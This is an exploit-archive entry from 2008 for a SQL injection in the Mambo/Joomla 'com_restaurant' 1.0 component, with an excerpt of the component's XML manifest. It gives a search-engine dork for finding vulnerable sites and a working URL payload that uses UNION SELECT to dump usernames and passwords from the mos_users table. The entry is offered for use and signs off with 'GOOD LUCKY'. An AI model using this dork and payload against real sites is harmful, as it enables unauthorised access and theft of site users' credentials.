Mambo Component Restaurant 1.0 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component Restaurant 1.0 Remote SQL Injection Vulnerability
# Published : 2008-01-31
# Author : S@BUN
# Previous Title : Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability
# Next Title : Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability

#########################################################################
#
# joomla SQL Injection(com_restaurant)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_restaurant"
#
########################################################################
EXPLOIT :

index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


#########################################################################
# S@BUN                  www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                     GOOD LUCKY                               S@BUN
#########################################################################

  <name>Restaurant</name>
  <creationDate>02-05-2005</creationDate>
  <author>1100cc</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>webmaster@1100cc.nl</authorEmail>

  <authorUrl>www.1100cc.nl</authorUrl>
  <version>1.0</version>
  <description>Restaurant is a fully integrated Mambo component.</description>

# www.Syue.com [2008-01-31]